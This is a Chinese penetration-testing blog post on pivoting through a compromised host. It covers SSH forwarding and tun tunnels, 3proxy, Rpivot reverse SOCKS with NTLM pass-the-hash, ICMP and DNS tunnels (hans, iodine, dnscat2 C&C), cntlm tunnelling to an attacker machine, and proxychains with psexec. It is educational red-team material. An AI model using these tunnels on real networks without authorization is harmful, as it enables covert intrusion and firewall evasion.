<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="系统安全,tools," />





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/avatar.png?v=5.1.0" />






<meta name="description" content="渗透测试人员通常会遍历边界网络，以便获得更多的关键性的基础设备。常见的情况主要是在成功的进入到了内部网络，想要进一步横向扩展时，或者是需要多级级联的时候。而转发这是这种情况下常使用的技术，利用被控的靶机作为网络跳板，其目的是为了更好的放大内网的可见性，进行安全测试评估。">
<meta name="keywords" content="系统安全,tools">
<meta property="og:type" content="article">
<meta property="og:title" content="常用的转发技术">
<meta property="og:url" content="http://rcoil.me/2017/06/常用的转发技术/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="渗透测试人员通常会遍历边界网络，以便获得更多的关键性的基础设备。常见的情况主要是在成功的进入到了内部网络，想要进一步横向扩展时，或者是需要多级级联的时候。而转发这是这种情况下常使用的技术，利用被控的靶机作为网络跳板，其目的是为了更好的放大内网的可见性，进行安全测试评估。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ooo.0o0.ooo/2017/06/11/593cf8ede0c82.png">
<meta property="og:updated_time" content="2017-08-01T15:57:41.624Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="常用的转发技术">
<meta name="twitter:description" content="渗透测试人员通常会遍历边界网络，以便获得更多的关键性的基础设备。常见的情况主要是在成功的进入到了内部网络，想要进一步横向扩展时，或者是需要多级级联的时候。而转发这是这种情况下常使用的技术，利用被控的靶机作为网络跳板，其目的是为了更好的放大内网的可见性，进行安全测试评估。">
<meta name="twitter:image" content="https://ooo.0o0.ooo/2017/06/11/593cf8ede0c82.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://rcoil.me/2017/06/常用的转发技术/"/>





  <title> 常用的转发技术 | RcoIl的窝 </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-阅读榜">
          <a href="/阅读榜/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br />
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://rcoil.me/2017/06/常用的转发技术/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                常用的转发技术
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-06-10T23:33:55+08:00">
                2017-06-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/系统安全/" itemprop="url" rel="index">
                    <span itemprop="name">系统安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/06/常用的转发技术/" class="leancloud_visitors" data-flag-title="常用的转发技术">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count">℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>渗透测试人员通常会遍历边界网络，以便获得更多的关键性的基础设备。<br>常见的情况主要是在成功的进入到了内部网络，想要进一步横向扩展时，或者是需要多级级联的时候。而转发这是这种情况下常使用的技术，利用被控的靶机作为网络跳板，其目的是为了更好的放大内网的可见性，进行安全测试评估。<br><a id="more"></a></p>
<hr>
<p>适用端口转发的网络环境有以下几种：</p>
<ol>
<li><p>服务器处于内网，可以访问外部网络。</p>
</li>
<li><p>服务器处于外网，可以访问外部网络，但是服务器安装了防火墙来拒绝敏感端口的连接。</p>
</li>
<li><p>服务器处于内网，对外只开放了80端口，并且服务器不能访问外网网络。</p>
</li>
</ol>
<p>对于以上三种情况，传统的方法可以突破1和2二种（全都可以理解为lcx），第3种可以使用SOCKS代理。</p>
<h1 id="目标是具有公共IP的"><a href="#目标是具有公共IP的" class="headerlink" title="目标是具有公共IP的"></a>目标是具有公共IP的</h1><p>一般的场景是这样的，测试人员通过查找目标与外部对接的业务程序，比如<code>Web程序</code>，通过一些程序的缺陷，获取到<code>WebShell</code>，并希望能进行内网的扩展。<br>这种情景下，如果要进行端口转发，在靶机上绑定的端口应该是可以从外部网络访问的。</p>
<h2 id="SSH端口复用"><a href="#SSH端口复用" class="headerlink" title="SSH端口复用"></a>SSH端口复用</h2><p>如果能在靶机上找到SSH的<code>key</code>,可以使用ssh来生成一个<code>socks</code>服务。连接到主机如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh username@host -D 1080</div></pre></td></tr></table></figure></p>
<p>也可以将特定的端口转发到特定的主机。假设需要在内网主机192.168.1.2中访问VPS的SMB共享。则<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh username@host -L 445:192.168.1.2:445</div></pre></td></tr></table></figure></p>
<p>这样一来，VPS上的445端口将在本地打开。<code>请注意</code>，要绑定特权端口（如445），需要root权限。</p>
<h3 id="使用SSH隧道"><a href="#使用SSH隧道" class="headerlink" title="使用SSH隧道"></a>使用SSH隧道</h3><p><code>openssh4.3版本</code>可以通过建立的ssh隧道来传输网络流量，这比典型的tcp隧道具有优势。<br>假如，需要在本地使用<code>nmap</code>对靶机内网进行SYN-Scan,可以通过创建一个<code>tunnel</code>(隧道),这是通过ssh连接进行数据传输，这样就不需要用到<code>proxychains</code>或其他代理工具。当然，前提是有root权限，因为创建<code>tunnel</code>(隧道)是特权操作。<br>编辑<code>/etc/ssh/sshd_config</code>文件（服务器端）中：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PermitRootLogin yes</div><div class="line">PermitTunnel yes</div></pre></td></tr></table></figure></p>
<p>接着重启ssh服务，<br>客户端上的以下命令将在Client和Server上创建一对tun设备：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh username@server -w 0:0</div></pre></td></tr></table></figure></p>
<p><code>-w 0:0</code>   如通道tunnel建立成功后，将在Client和Server端分别出现名为tun0的界面；<br><code>-w 1:1</code>   如通道tunnel建立成功后，将在Client和Server端分别出现名为tun1的界面；<br><code>-w any:any</code>使用语法来获取下一个可用的<code>tunnel</code>。</p>
<p>注意：不要混淆了Linux下面名为tunl0的预设Tunnel界面，请用 ip addr show 命令检查。</p>
<p>Client和Server端之间的隧道已启用，但接口尚未配置。<br>Client端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0</div></pre></td></tr></table></figure></p>
<p>Server端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0</div></pre></td></tr></table></figure></p>
<p>在Server端上启用ip转发和NAT：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">echo 1 &gt; /proc/sys/net/ipv4/ip_forward</div><div class="line">iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE</div></pre></td></tr></table></figure></p>
<p>这个例子中，需要将对端主机的默认网关设置为<code>1.1.1.1</code>，或设置特定的路由主机/网络：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">route add -net 10.0.0.0/16 gw 1.1.1.1</div></pre></td></tr></table></figure></p>
<p>在这个例子中，服务器的外部网络接口是两端eth0所创建Tunnel的tun0口。</p>
<p>再举个例子：<br>ssh简单的使用：通过VPS上的SSH隧道使用本地msf<br>编辑 <code>/etc/ssh/sshd_config</code><br>在文件最后添加<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GatewayPorts yes</div></pre></td></tr></table></figure></p>
<p>接着是重启ssh服务，启ssh隧道：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh -N -R 5556:192.168.2.100:5556 username@host</div></pre></td></tr></table></figure></p>
<p>msf监听5556端口就可以了。</p>
<h2 id="3proxy"><a href="#3proxy" class="headerlink" title="3proxy"></a>3proxy</h2><p>项目地址：<a href="https://github.com/z3APA3A/3proxy/releases" target="_blank" rel="external">3proxy-0.8.9</a>，这个工具适用于多个平台，下载进行编译就可以使用。通常用于socks代理和端口转发。<a href="https://3proxy.ru/howtoe.asp" target="_blank" rel="external">使用手册在这</a><br>此工具从配置文件中获取所有选项。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">3proxy.exe config_file</div></pre></td></tr></table></figure></p>
<p>如果是在Linux系统上：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./3proxy config_file</div></pre></td></tr></table></figure></p>
<p>使用3proxy作为socks5代理作用于端口1080，将以下行放在配置中：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">socks -p1080</div></pre></td></tr></table></figure></p>
<p>虽然这样可以通过这个代理隧道进行大部分基于内网的的pentesting。但是这样的设置是不安全的，最好是加上身份验证或者基于访问IP的控制规则设定。要隧道使用特定端口，使用以下语法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">tcppm &lt;localport&gt; &lt;targethost&gt; &lt;targetport&gt;</div></pre></td></tr></table></figure></p>
<p>不过我倒觉得这个有点累赘了，可能是我没用对的缘故吧。</p>
<h1 id="NAT情景（穿透）"><a href="#NAT情景（穿透）" class="headerlink" title="NAT情景（穿透）"></a>NAT情景（穿透）</h1><p>常见的场景为，除了正在通信特定端口，其余的端口就算进行转发，从外部也是访问不到的，这是制定了转发规则。那就只能进行反向链接。</p>
<h2 id="SSH反向端口转发–3proxy"><a href="#SSH反向端口转发–3proxy" class="headerlink" title="SSH反向端口转发–3proxy"></a>SSH反向端口转发–3proxy</h2><p>这种转发设置看起来像这样：</p>
<p>在Server端上运行3proxy服务：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">socks -p31337</div></pre></td></tr></table></figure></p>
<p>在Client端创建一个单独的用户。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">adduser sshproxy</div></pre></td></tr></table></figure></p>
<p>该用户必须是低权限的，不具有shell权限。<br>编辑<code>/etc/passwd</code>并将shell切换到<code>/bin/false</code>。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">root:x:0:0:root:/root:/bin/bash</div><div class="line">...</div><div class="line">sshproxy:x:1000:1001:,,,:/home/sshproxy:/bin/false</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>使用<code>-R</code>建立新创建的用户与Server端的连接。<br>Linux系统：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh sshproxy@host -R 31337:127.0.0.1:31337</div></pre></td></tr></table></figure></p>
<p>对于Windows，您需要先上传<code>plink.exe</code>。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">plink.exe sshproxy@host -R 31337:127.0.0.1:31337</div></pre></td></tr></table></figure></p>
<p><code>-R</code>是允许绑定服务器端上已使用的端口，而与此端口的所有连接将会被中继到Client端上的指定端口。这样就可以在Client端上运行<code>3proxy socks服务</code>，并通过<code>ssh -R</code>标志访问攻击者主机上的这个端口。</p>
<h2 id="Rpivot"><a href="#Rpivot" class="headerlink" title="Rpivot"></a>Rpivot</h2><p>在<code>NAT穿透</code>中比较常用，<a href="https://github.com/artkond/rpivot" target="_blank" rel="external">项目地址</a>，<code>Rpivot</code>是一个socks反向代理工具，允许通过socks代理隧道流量，回连于本机并结合socks代理。它的工作原理恰好于<code>ssh -D</code>相反。<br>Server端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0</div></pre></td></tr></table></figure></p>
<p>Client端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python client.py --server-ip &lt;ip&gt; --server-port 9999</div></pre></td></tr></table></figure></p>
<p>结果就是，socks4代理服务将被绑定在靶机上允许外部访问的1080端口。</p>
<h1 id="内网转发"><a href="#内网转发" class="headerlink" title="内网转发"></a>内网转发</h1><p>内网转发，假设已经通过某个途径（如社会工程学）到达了内网。在渗透机上的数据连通性和执行命令操作能力有限，如果靶机网络没有做限制的话，可以尝试上面的方法，但是如果使用防火墙的话，就要想别的方法了。</p>
<h2 id="ICMP隧道"><a href="#ICMP隧道" class="headerlink" title="ICMP隧道"></a>ICMP隧道</h2><p><code>ICMP隧道</code>是通过将任意数据注入发送到远程计算机的回送数据包来工作的。要判断是否能使用ICMP隧道，我们只需要关注一件事情：可以ping一个外部服务器。如果能到达外部网络，，那么很有可能可以建立一个icmp隧道。缺点是需要<code>root/administrator</code>权限。</p>
<h3 id="Hans"><a href="#Hans" class="headerlink" title="Hans"></a>Hans</h3><p><a href="http://code.gerade.org/hans/" target="_blank" rel="external">项目地址</a>,适用于多平台。<br>编译hans:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">tar -xzf hans-version.tar.gz</div><div class="line">cd hans-version</div><div class="line">make</div></pre></td></tr></table></figure></p>
<p>在Server端执行（root权限）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./hans -v -f -s 10.1.2.0 -p password</div></pre></td></tr></table></figure></p>
<p><code>-v</code>是显示信息，<code>-f</code>为后台运行，<code>-s</code>是Server创建新的tunnel，并从网络10.1.2.0/24为其分配IP：<code>10.1.2.1</code><br>在Client端执行（root权限）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./hans -c server_address -p password</div></pre></td></tr></table></figure></p>
<p>连接成功后，Client端应该这么显示：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"># ping 10.1.2.1</div><div class="line">PING 10.1.2.1 (10.1.2.1) 56(84) bytes of data.</div><div class="line">64 bytes from 10.1.2.1: icmp_seq=1 ttl=65 time=42.9 ms</div></pre></td></tr></table></figure></p>
<p>在Windows上，必须以管理员身份运行命令提示符，才能使hans运行。</p>
<h3 id="icmptunnel"><a href="#icmptunnel" class="headerlink" title="icmptunnel"></a>icmptunnel</h3><p><a href="https://github.com/jamesbarlow/icmptunnel" target="_blank" rel="external">项目地址</a>，这工具只能在linux下运行。</p>
<h2 id="DNS隧道"><a href="#DNS隧道" class="headerlink" title="DNS隧道"></a>DNS隧道</h2><p>不论对出站流量采取多么严格的访问控制，你可能都要允许至少对一个服务器的 DNS 请求。对手就可以利用这个防火墙上的“大洞”来偷运数据，并且建立一个非常难以限制的隐蔽命令控制信道。</p>
<h3 id="Iodine"><a href="#Iodine" class="headerlink" title="Iodine"></a>Iodine</h3><p>它几乎是和<code>hans icmp隧道</code>工具一样的工作机制，它在它们之间创建一对tun适配器和隧道数据作为DNS查询。<a href="http://dev.kryo.se/iodine/wiki/HowtoSetup" target="_blank" rel="external">使用手册</a><br>Server端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">iodined -f -c -P password 1.1.1.1 tunneldomain.com</div></pre></td></tr></table></figure></p>
<p>Client端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">iodine -f -P password tunneldomain.com -r</div></pre></td></tr></table></figure></p>
<p>成功连接将直接在客户端生成地址<code>1.1.1.2</code>。请注意，这种隧道技术的速度相当慢。最好的办法是在生成的连接上使用ssh连接：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ssh &lt;user&gt;@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080</div></pre></td></tr></table></figure></p>
<h3 id="Dnscat2"><a href="#Dnscat2" class="headerlink" title="Dnscat2"></a>Dnscat2</h3><p><a href="https://github.com/iagox86/dnscat2" target="_blank" rel="external">Dnscat2</a>通过建立C＆C通道递归DNS查询。此工具不需要<code>root/administrator</code>权限（在Windows和Linux上都可以使用）。它还支持端口转发。<br>Server端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">ruby ./dnscat2.rb tunneldomain.com</div></pre></td></tr></table></figure></p>
<p>Client端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./dnscat2 tunneldomain.com</div></pre></td></tr></table></figure></p>
<p>收到Server端的连接后，可以使用<code>windows命令</code>查看活动会话：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">dnscat2&gt; windows</div><div class="line">0 :: main [active]</div><div class="line">  dns1 :: DNS Driver running on 0.0.0.0:53 domains = tunneldomain.com [*]</div><div class="line">  1 :: command session (debian)</div><div class="line">  2 :: sh (debian) [*]</div></pre></td></tr></table></figure></p>
<p>要启动端口转发，请选择一个命令会话session -i <num>：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">dnscat2&gt; session -i 1</div><div class="line">New window created: 1</div><div class="line">New window created: 1</div><div class="line">history_size (session) =&gt; 1000</div><div class="line">This is a command session!</div><div class="line"></div><div class="line">That means you can enter a dnscat2 command such as</div><div class="line">&apos;ping&apos;! For a full list of clients, try &apos;help&apos;.</div><div class="line"></div><div class="line">command session (debian) 1&gt;</div></pre></td></tr></table></figure></num></p>
<p>使用<code>listen [lhost:]lport rhost:rport</code>命令转发端口：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">command session (debian) 1&gt; listen 127.0.0.1:8080 10.0.0.20:80</div></pre></td></tr></table></figure></p>
<p>这将绑定靶机上的端口8080，并将所有连接转发到10.0.0.20:80。</p>
<h2 id="HTTP代理"><a href="#HTTP代理" class="headerlink" title="HTTP代理"></a>HTTP代理</h2><h3 id="Rpivot-1"><a href="#Rpivot-1" class="headerlink" title="Rpivot"></a>Rpivot</h3><p>这个在上面的NAT穿透中讲过，但是它还支持<code>NTLM-HTTP代理</code>。<br>Client端：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">python client.py --server-ip &lt;rpivot_server_ip&gt; --server-port 9999\</div><div class="line">--ntlm-proxy-ip &lt;proxy_ip&gt; --ntlm-proxy-port 8080 --domain CONTOSO.COM\</div><div class="line">--username RcoIl --password P@ssw0rd</div></pre></td></tr></table></figure></p>
<p>如果有<code>LM:NT</code>的哈希值，也是可以使用的、<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">python client.py --server-ip &lt;rpivot_server_ip&gt;\</div><div class="line">--server-port 9999 --ntlm-proxy-ip &lt;proxy_ip&gt; --ntlm-proxy-port 8080 --domain CONTOSO.COM\</div><div class="line">--username RcoIl --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45</div></pre></td></tr></table></figure></p>
<h3 id="Cntlm"><a href="#Cntlm" class="headerlink" title="Cntlm"></a>Cntlm</h3><p><a href="http://cntlm.sourceforge.net/" target="_blank" rel="external">Cntlm</a>是通过NTLM代理运行于任何非敏感程序的首选代理工具。这个工具可以针对代理进行身份验证，并将本地端口绑定到指定的外部地址。</p>
<p>端口绑定不需要任何身份验证，因此可以直接使用工具（例如putty / ssh）。它使用配置文件进行操作。<br>下面是一个准系统配置示例：转发端口443（这个端口最有可能通过代理）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Username RcoIl</div><div class="line">Password P@ssw0rd</div><div class="line">Domain CONTOSO.COM</div><div class="line">Proxy 10.0.0.10:8080</div><div class="line">Tunnel 2222:&lt;attackers_machine&gt;:443</div></pre></td></tr></table></figure></p>
<p>windows运行：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">cntlm.exe -c config.conf</div></pre></td></tr></table></figure></p>
<p>或者在Linux上：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./cntlm -c config.conf</div></pre></td></tr></table></figure></p>
<p>现在，由于在开着端口443上的远程主机上运行ssh，您可以启动ssh客户机（openssh/putty）并连接到本地端口2222以访问外部靶机。</p>
<h3 id="OpenVpn通过HTTP代理"><a href="#OpenVpn通过HTTP代理" class="headerlink" title="OpenVpn通过HTTP代理"></a>OpenVpn通过HTTP代理</h3><p><a href="https://openvpn.net/index.php/open-source/documentation/howto.html" target="_blank" rel="external">OpenVpn</a>这东西太大了， 它也支持通过NTLM代理隧道tcp连接。将此行添加到您的配置文件中（root权限）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http-proxy &lt;proxy_ip&gt; 8080 &lt;file_with_creds&gt; ntlm</div></pre></td></tr></table></figure></p>
<h1 id="使用SOCKS代理"><a href="#使用SOCKS代理" class="headerlink" title="使用SOCKS代理"></a>使用SOCKS代理</h1><p>在实际渗透测试过程中，当我们成功的拿下第一台靶机后，此时我们又想对目标内网进一步渗透测试时，socks能够帮助我们更加快速的，方便的访问目标内网的各种资源，比传统的端口转发更加实用。</p>
<p>如果需要代理的程序不是使用原始套接字（例如，nmap syn-scan），那么可以使用proxychains通过socks代理强制代理。<br>在<code>/etc/proxychains.conf</code>中编辑代理服务器：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[ProxyList]</div><div class="line"># add proxy here ...</div><div class="line"># meanwile</div><div class="line"># defaults set to &quot;tor&quot;</div><div class="line">socks4  127.0.0.1 3128</div></pre></td></tr></table></figure></p>
<p>准备好了 只是proxychains给你最喜欢的pwn工具：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">proxychains program_name</div></pre></td></tr></table></figure></p>
<p>使用impacket的psexec.py与proxychains：<br><img src="https://ooo.0o0.ooo/2017/06/11/593cf8ede0c82.png" alt=""><br>更多的内容用力戳戳瞎下面这篇文章。</p>
<p><font color="red" size="5" face="黑体"><a href="http://bobao.360.cn/learning/detail/3502.html?utm_source=tuicool&amp;utm_medium=referral" target="_blank" rel="external">内网漫游之SOCKS代理大结局</a></font><br>这篇文章是我见过最全的SOCKS代理</p>
<hr>
<p>参考：<br><a href="http://www.linuxidc.com/Linux/2012-09/69970.htm" target="_blank" rel="external">利用ssh端口转发实现Site-to-Site简易VPN通道</a><br><a href="http://blog.csdn.net/tan6600/article/details/52142254" target="_blank" rel="external">利用 DNS 隧道传递数据和命令来绕过防火墙</a><br><a href="https://artkond.com/2017/03/23/pivoting-guide/#target-with-public-ip" target="_blank" rel="external">A Red Teamer’s guide to pivoting</a><br><a href="http://bobao.360.cn/learning/detail/3502.html?utm_source=tuicool&amp;utm_medium=referral" target="_blank" rel="external">内网漫游之SOCKS代理大结局</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
